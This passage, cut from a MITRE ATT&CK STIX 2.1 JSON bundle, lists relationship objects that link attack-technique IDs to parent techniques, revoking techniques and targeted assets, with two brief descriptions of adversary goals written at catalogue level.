"attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f748caa-dd1e-41aa-b09a-333ce8916bd0", "created": "2020-02-05T14:28:17.039Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8f947e00-2579-4120-a8b0-d466e59fac1a", "created": "2023-09-28T19:49:25.824Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:49:25.824Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8fe2bc4c-e9f7-430d-84d5-e3d603141dcb", "created": "2023-09-29T17:04:17.682Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:04:17.682Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--908e3fa1-e2b9-475e-b72d-06343a65a3c6", "created": "2023-09-28T20:04:44.041Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:04:44.041Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--910bada1-c923-4009-a9ea-da257072f168", "created": "2023-09-29T16:29:27.902Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:29:27.902Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--911d412e-9dd7-49ae-ab6a-a078b44a1791", "created": "2020-01-15T16:27:32.733Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", "target_ref": "attack-pattern--dca670cf-eeec-438f-8185-fd959d9ef211", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9131af72-6fa7-4292-b959-05f774e77f7e", "created": "2020-02-20T15:37:27.398Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9175721d-ca74-4648-94e6-11e117a2cd12", "created": "2020-10-01T00:58:35.342Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--810d8072-afb6-4a56-9ee7-86379ac4a6f3", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9238d096-ed26-4a93-829e-d67ee3abc93c", "created": "2020-03-15T15:30:42.481Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", "target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9321a544-0bde-4d6d-a197-303b70e39fc3", "created": "2020-01-17T16:10:58.801Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--938ff1d4-acce-4e4e-8a9c-be62799dff8e", "created": "2023-09-29T17:38:40.536Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:38:40.536Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9395c820-d828-4dea-bcde-88c4baf06440", "created": "2020-02-21T21:16:18.148Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--93c336f2-7e7c-4c79-af16-faae03e66121", "created": "2023-09-29T18:44:09.293Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:44:09.293Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--94035326-619c-4307-ac07-5def29b85f59", "created": "2020-01-15T18:02:50.149Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2ba5aa71-9d15-4b22-b726-56af06d9ad2f", "target_ref": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--943a9a5c-7826-451d-ac73-34353ea40595", "created": "2023-09-29T16:33:36.496Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:33:36.496Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--944b9cc3-95c7-4e0d-8b62-576aa6cf7217", "created": "2020-02-11T20:34:58.622Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--94b5356f-dbca-4d46-a5f2-185bc68d9891", "created": "2024-05-22T17:25:21.264Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:52:08.269Z", "description": "Asset Mapping Rationale: Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Adversaries may also leverage a Network Device CLI on network devices to discover password policy information.", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--950c7be9-c84d-4543-9f3b-71eae9019fe4", "created": "2020-02-11T18:26:36.527Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd", "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9529dc44-9a72-49b7-bfea-713356b0f55a", "created": "2020-02-11T18:38:22.699Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9537d9c9-ba0d-42d9-b97d-3b28bfe265e6", "created": "2024-04-09T20:47:47.280Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:47:47.280Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--956bbc7f-82c2-4097-8b7b-1e9d732c532d", "created": "2023-09-28T20:17:07.288Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:17:07.288Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96575047-df79-4e74-9f88-44307a46bce0", "created": "2020-03-09T14:38:24.631Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--967839f9-a3b8-4469-89c8-1e3ac3a1f1d2", "created": "2024-05-22T15:35:27.035Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T15:35:27.035Z", "description": "Asset Mapping Rationale: Adversaries may create an account to maintain access to victim systems.[1] With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.", "relationship_type": "targets", "source_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--968fd463-fec4-4b2d-b3c9-950d8471b9a8", "created": "2023-09-28T20:25:30.229Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:25:30.229Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96bf3005-d31e-42ce-a543-cdcf3d4a56bd", "created": "2020-01-17T16:15:20.106Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b", "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--96f5f245-a67b-4e3d-8d3f-ef2a7719a3fd", "created": "2020-03-30T03:10:12.851Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--d54416bd-0803-41ca-870a-ce1af7c05638", "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--976ffdd9-bc86-4bc6-80a0-736705f049f9", "created": "2020-10-01T00:56:25.256Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9774fd36-2d85-4570-9f63-97f2d6c1ca6c", "created": "2020-03-27T21:08:25.409Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9794e87a-1130-4d59-863f-f0c55e53ae30", "created": "2024-05-21T16:22:20.991Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-21T16:22:20.991Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--97d152a1-4cbd-4088-b23e-99354a730e47", "created": "2020-10-19T23:51:06.043Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--97e20860-29d9-4738-a9a8-6cc3e4db23f1", "created": "2023-09-29T16:40:54.250Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:40:54.250Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--97f42cef-bc2a-47c5-b408-8e38aab4030e", "created": "2023-09-29T16:41:32.631Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:41:32.631Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--97f863d7-e68a-4cc8-ab3b-a7e9a1cc2319", "created": "2023-09-29T18:47:52.800Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:47:52.800Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--982441e5-d8f3-4b12-a765-4b503ce5db3b", "created": "2020-02-04T12:52:13.385Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--982d0b4f-274a-4738-9262-57fc80d468f9", "created": "2024-03-26T15:41:51.806Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-26T15:41:51.806Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9951eb11-8140-420d-8e2d-56fbe0ff0134", "created": "2023-09-29T18:03:23.576Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:03:23.576Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--997669d5-29e4-4a89-81b8-9aa84ebce527", "created": "2020-10-02T16:46:42.674Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--99994a2f-c6d3-4766-92e4-b8d1e62e8aa4", "created": "2020-02-12T14:10:51.040Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", "target_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--99f84b91-32a1-4ade-8de5-5d2a0359302f", "created": "2023-09-28T19:56:54.642Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": 